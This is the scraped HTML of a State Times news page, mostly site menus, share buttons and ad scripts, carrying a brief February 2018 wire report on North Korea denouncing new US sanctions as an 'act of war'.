href='https://news.statetimes.in/arjun-parineetis-namastey-england-to-hit-theatres-on-december-7/' title='Arjun, Parineeti&#8217;s &#8216;Namastey England&#8217; to hit theatres on December 7'> Arjun, Parineeti&#8217;s &#8216;Namastey England&#8217; to hit theatres on December 7</a><span>  1 day ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='https://news.statetimes.in/aamir-to-shoot-thugs-of-hindostan-climax-in-rajasthan/' title='Aamir to shoot &#8216;Thugs of Hindostan&#8217; climax in Rajasthan'><img src='https://news.statetimes.in/wp-content/uploads/2017/08/There-are-talented-stars-other-than-the-Khans-Aamir-120x76.jpg?x39047' alt='Aamir to shoot &#8216;Thugs of Hindostan&#8217; climax in Rajasthan' width='117' height='74'></a></div><div class='subcat-title'><a href='https://news.statetimes.in/aamir-to-shoot-thugs-of-hindostan-climax-in-rajasthan/' title='Aamir to shoot &#8216;Thugs of Hindostan&#8217; climax in Rajasthan'> Aamir to shoot &#8216;Thugs of Hindostan&#8217; climax in Rajasthan</a><span>  3 days ago</span></div></li></ul><a href='https://news.statetimes.in/section/entertainment/bollywod/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58108' data-id='12' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58108'></ul><a href='https://news.statetimes.in/section/entertainment/hollywood/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58109' data-id='13' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58109'></ul><a href='https://news.statetimes.in/section/entertainment/movies/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58110' data-id='14' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58110'></ul><a href='https://news.statetimes.in/section/entertainment/television/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="https://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="https://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="https://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="https://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                                                                <div class="device-menu-wrap mom_visibility_device">
                        <div id="menu-holder" class="device-menu-holder">
                            <i class="fa-icon-align-justify mh-icon"></i> <span class="the_menu_holder_area"><i class="dmh-icon"></i>Menu</span><i class="mh-caret"></i>
                        </div>
                        <ul id="menu-primary-two-1" class="device-menu mom_visibility_device"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="https://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="https://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="https://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="https://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="https://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="https://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="https://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="https://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="https://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="https://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="https://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="https://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="https://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                        </div>
                                            		    <div class="nav-buttons">
                                        			<span class="nav-button nav-login">
			    <i class="momizat-icon-users"></i>
			</span>
			<div class="nb-inner-wrap">
			    <div class="nb-inner lw-inner">
			                            <div class="mom-login-widget">
                                                        <form class="mom-login-form" action="http://news.statetimes.in/wp-login.php" method="post">
					<div class="mom-username">
						<input type="text" name="log" value="" placeholder="username">
					</div>

					<div class="mom-password">
						<input type="password" name="pwd" value="" placeholder="password">
					</div>

					<div class="mom-submit-wrapper">
						<button class="button submit user-submit" name="user-submit" type="submit">Log In</button>
						<input type="checkbox" id="rememberme" name="rememberme" value="forever" >
						<label for="rememberme"><i class="fa-icon-ok"></i>Remember Me</label>
                                                <input type="hidden" name="redirect_to" value="http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/" />
					</div>
										<span class="mlw-extra">
																		<a href="http://news.statetimes.in/wp-login.php?action=lostpassword" class="mlw-reset">Lost your Password</a>
											</span>
					                            </form>
                            			    <div class="clear"></div>
                        </div>
			    </div>
			</div>
		    		                        <span class="nav-button nav-search">
                        <i class="fa-icon-search"></i>
                    </span>
                    <div class="nb-inner-wrap search-wrap border-box">
                        <div class="nb-inner sw-inner">
                        <div class="search-form mom-search-form">
                            <form method="get" action="http://news.statetimes.in">
                                <input class="sf" type="text" placeholder="Search ..." autocomplete="off" name="s">
                                <button class="button" type="submit"><i class="fa-icon-search"></i></button>
                            </form>
                            <span class="sf-loading"><img src="http://news.statetimes.in/wp-content/themes/goodnews5/images/ajax-search-nav.gif?x39047" alt="loading..." width="16" height="16"></span>
                        </div>
                    <div class="ajax_search_results">
                    </div> <!--ajax search results-->
                    </div> <!--sw inner-->
                    </div> <!--search wrap-->
                    
                            <span class="nav-button nav-social-button twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></span>
        
                <span class="nav-button nav-social-button facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></span>        
        
                   <span class="nav-button nav-social-button gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></span>     
        
        
                        <span class="nav-button nav-social-button youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></span>
                

        

        
        
                <span class="nav-button nav-social-button tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></span>
                             <span class="nav-button nav-social-button rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></span>
        	
			    </div> <!--nav-buttons-->

                </div>
                </div> <!--nav inner-->
            </nav> <!--Navigation-->
            	    <div class="boxed-content-wrapper clearfix">
                        <div class="nav-shaddow"></div>
                         <div style="margin-top:-17px; margin-bottom:20px;"></div>
            
            <div class="inner">
                        
        <div class="breaking-news">
    <div class="the_ticker" style="margin:0;">
    <div class="bn-title"><span>Latest News</span></div>
    <div class="news-ticker animation-updown custom-animation" data-timeout="5000">
        <ul>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/working-for-decades-at-bagh-e-bahu-lensmen-at-verge-of-starvation/">Working for decades at Bagh-e-Bahu, lensmen at verge of starvation</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/cm-orders-probe-madnis-son-declines-kvib-job-offer/">CM orders probe: Madni&#8217;s son declines KVIB job offer</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/6-civilians-killed-13-injured-in-pak-shelling-during-last-10-months-in-j-k/">6 civilians killed, 13 injured in Pak shelling during last 10 months in J-K</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/militants-gun-down-cop-near-chrar-e-sharif-shrine-in-jks-budgam/">Militants gun down cop near Chrar-e-Sharif shrine in J&#038;K&#8217;s Budgam</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/j-k-exploits-just-16-of-hydro-power-potential-despite-growing-demand-survey/">J-K exploits just 16% of hydro-power potential despite growing demand: Survey</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/">N Korea slams latest US sanctions as &#8216;act of war&#8217;</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/jansewa-ka-ek-avloken-celebrates-annual-day/">Jansewa Ka Ek Avloken celebrates Annual Day</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/national-conference-leader-farooq-abdullah-interacting-with-media-persons/">National Conference leader Farooq Abdullah interacting with media persons.</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/state-bank-of-india-in-uk-set-for-major-restructuring/">State Bank of India in UK set for major restructuring</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/govt-appointed-toll-collection-firms-need-to-pay-stamp-duty-hc/">Govt-appointed toll collection firms need to pay stamp duty: HC</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/press-conference-of-serv-shakti-sevak-sanstha-jk-organised-at-press-club/">Press conference of Serv Shakti Sevak Sanstha, J&#038;K organised at Press Club</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/kohli-dhoni-rested-as-india-select-young-squad-for-t20-tri-series/">Kohli, Dhoni rested as India select young squad for T20 tri-series</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/nia-to-seek-interpol-red-corner-notice-against-pak-diplomat-wanted-in-terror-plot/">NIA to seek Interpol Red Corner notice against Pak diplomat wanted in terror plot</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/jk-army-porters-union-kargil-jammu-protest/">J&#038;K Army Porters Union (Kargil) Jammu protest</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/day-to-day-safety-should-be-part-of-our-lives-pm-modi/">Day-to-day safety should be part of our lives: PM Modi</a></li>
        </ul>
    </div> <!--news ticker-->
    </div>
        </div> <!--breaking news-->
            </div>
    <div class="inner">
        
                            <div class="main_container">
           <div class="main-col">
                                <div class="category-title">
                        <div class="mom_breadcrumb breadcrumb breadcrumbs"><div class="breadcrumbs-plus">
<span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/" class="home"><span itemprop="title">Home</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/" title="News"><span itemprop="title">News</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/imp-today/" title="Latest News"><span itemprop="title">Latest News</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemprop="name">N Korea slams latest US sanctions as &#8216;act of war&#8217;</span></div></div>                </div>
                                        <div class="base-box blog-post p-single bp-horizontal-share post-335137 post type-post status-publish format-standard has-post-thumbnail category-imp-today category-world"itemscope itemtype="http://schema.org/Article">
<div itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
    <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2017/04/North-Korea-quiet-amid-expectation-of-missile-follow-up-300x200.jpg">
    <meta itemprop="width" content="300">
    <meta itemprop="height" content="300">
  </div>
  <meta itemscope itemprop="mainEntityOfPage"  itemType="https://schema.org/WebPage" itemid="http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/"/>

  <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
    <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
      <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg">
      <meta itemprop="width" content="445">
      <meta itemprop="height" content="77">
    </div>
        <meta itemprop="name" content="State Times">
  </div>
  <meta itemprop="datePublished" content="2018-02-25T15:46:42+00:00"/>
  <meta itemprop="dateModified" content="2018-02-25T15:46:42+00:00"/>

<h1 class="post-tile entry-title" itemprop="headline">N Korea slams latest US sanctions as &#8216;act of war&#8217;</h1>
<div class="mom-post-meta single-post-meta"><span>on: <time datetime="2018-02-25T15:46:42+00:00" class="updated">February 25, 2018</time></span><span>In: <a href="http://news.statetimes.in/section/news/imp-today/" title="View all posts in Latest News">Latest News</a>, <a href="http://news.statetimes.in/section/news/world/" title="View all posts in World">World</a></span><span>Tags: </span><span><a href="http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/#respond">No Comments</a></span><div class="post-tools"><a href="javascript:window.print()" rel="nofollow" class="print"><i class="fa-icon-print"> </i>Print</a><a href="mailto:?subject=N Korea slams latest US sanctions as &#8216;act of war&#8217;&body=N Korea slams latest US sanctions as &#8216;act of war&#8217; http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/" rel="nofollow" class="email"><i class="fa-icon-envelope"> </i>Email</a></div></div><div class="entry-content">
               <div class="mom-social-share ss-horizontal border-box php-share" data-id="335137">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=N Korea slams latest US sanctions as &#8216;act of war&#8217;&url=http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
                <!-- <span class="count"></span> -->
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/&title=N Korea slams latest US sanctions as &#8216;act of war&#8217;&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2017/04/North-Korea-quiet-amid-expectation-of-missile-follow-up.jpg&amp;
url=http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/&amp;
is_video=false&amp;description=N Korea slams latest US sanctions as &#8216;act of war&#8217;"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

<br>    <p>Seoul: North Korea tody slammed the latest US measures against it as an &#8220;act of war&#8221;, after US President Donald Trump announced the &#8220;heaviest sanctions ever&#8221; on the nuclear-armed regime.</p>
<p>The measures, which Washington says are aimed at forcing Pyongyang to roll back its banned nuclear and weapons programmes, target more than 50 North Korea-linked shipping companies, vessels and trade businesses.</p>
<p>&#8220;Like we have said repeatedly, we consider any restrictions on us as an act of war,&#8221; the North&#8217;s foreign ministry said in a statement carried by the state-run KCNA news agency.</p>
<p>It also vowed a retaliation if the US &#8220;really has the nerves&#8221; to confront the North in a &#8220;rough&#8221; manner.</p>
<p>Trump warned on Friday that, if the latest sanctions don&#8217;t work, the US would &#8220;go to phase two&#8221; that &#8220;may be a very rough thing&#8221;, without elaborating.</p>
<p>In response, the North also vowed to &#8220;subdue the US in our own way&#8221; if provoked, saying &#8220;Trump is trying to change us with such sanctions and hostile remarks, which shows his ignorance about us&#8221;.</p>
<p>&#8220;We already have our own nuclear weapon &#8212; a treasured sword of justice to protect us from such threats from the US,&#8221; the foreign ministry said.</p>
<p>The comment came hours before the North&#8217;s senior delegation led by Kim Yong Chol, a blacklisted military general, is set to attend the closing ceremony of the South&#8217;s Winter Olympics, which will also be attended by Trump&#8217;s daughter Ivanka Trump. (PTI)</p>
      

    
		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-535 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-535 .mom-e3lanat-inner').boxSlider({
				autoScroll: false,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-535 .adr-next',
				prev: '.e3lanat-rotator-id-535 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-535" style="width:320px; height:100px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="8540" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- mobile one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:320px;height:100px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="6339736216"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
       <div class="mom-social-share ss-horizontal border-box php-share" data-id="335137">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=N Korea slams latest US sanctions as &#8216;act of war&#8217;&url=http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
                <!-- <span class="count"></span> -->
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/&title=N Korea slams latest US sanctions as &#8216;act of war&#8217;&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2017/04/North-Korea-quiet-amid-expectation-of-missile-follow-up.jpg&amp;
url=http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/&amp;
is_video=false&amp;description=N Korea slams latest US sanctions as &#8216;act of war&#8217;"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

</div> <!-- entry content -->
</div> <!-- base box -->

            <div class="np-posts">
                <ul>
			                    <li class="np-post prev border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/jansewa-ka-ek-avloken-celebrates-annual-day/"><img src="http://news.statetimes.in/wp-content/uploads/2018/02/farrrrr-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/02/farrrrr-180x120.jpg" alt="N Korea slams latest US sanctions as 'act of war'"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/jansewa-ka-ek-avloken-celebrates-annual-day/" class="link prev"><i class="fa-icon-double-angle-left"></i>Previous</a>
                            <h3><a href="http://news.statetimes.in/jansewa-ka-ek-avloken-celebrates-annual-day/">Jansewa Ka Ek Avloken celebrates Annual Day</a></h3>
                        </div>
                    </li>
		    		                        <li class="np-post next border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/j-k-exploits-just-16-of-hydro-power-potential-despite-growing-demand-survey/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="N Korea slams latest US sanctions as 'act of war'"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/j-k-exploits-just-16-of-hydro-power-potential-despite-growing-demand-survey/" class="link next"><i class="fa-icon-double-angle-right alignright"></i>Next</a>
                            <h3><a href="http://news.statetimes.in/j-k-exploits-just-16-of-hydro-power-potential-despite-growing-demand-survey/">J-K exploits just 16% of hydro-power potential despite growing demand: Survey</a></h3>
                        </div>
                    </li>
		                    </ul>
            </div> <!-- np posts -->
		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="322174" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block"
     data-ad-format="autorelaxed"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4609961952"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                <h2 class="single-title">Related Articles</h2>
            <div class="base-box single-box">
                <ul class="single-related-posts">
	   	     	       <li>
			                        <a href="http://news.statetimes.in/working-for-decades-at-bagh-e-bahu-lensmen-at-verge-of-starvation/"><img src="http://news.statetimes.in/wp-content/uploads/2018/02/a-1-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/02/a-1-610x380.jpg" alt="Working for decades at Bagh-e-Bahu, lensmen at verge of starvation"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/working-for-decades-at-bagh-e-bahu-lensmen-at-verge-of-starvation/">Working for decades at Bagh-e-Bahu, lensmen at verge of starvation</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-02-25T16:59:27+00:00">February 25, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/cm-orders-probe-madnis-son-declines-kvib-job-offer/"><img src="http://news.statetimes.in/wp-content/uploads/2017/03/ST-LOGO-1-100x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2017/03/ST-LOGO-1.jpg" alt="CM orders probe: Madni's son declines KVIB job offer"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/cm-orders-probe-madnis-son-declines-kvib-job-offer/">CM orders probe: Madni&#8217;s son declines KVIB job offer</a></h4>
                        <div class="mom-post-meta">
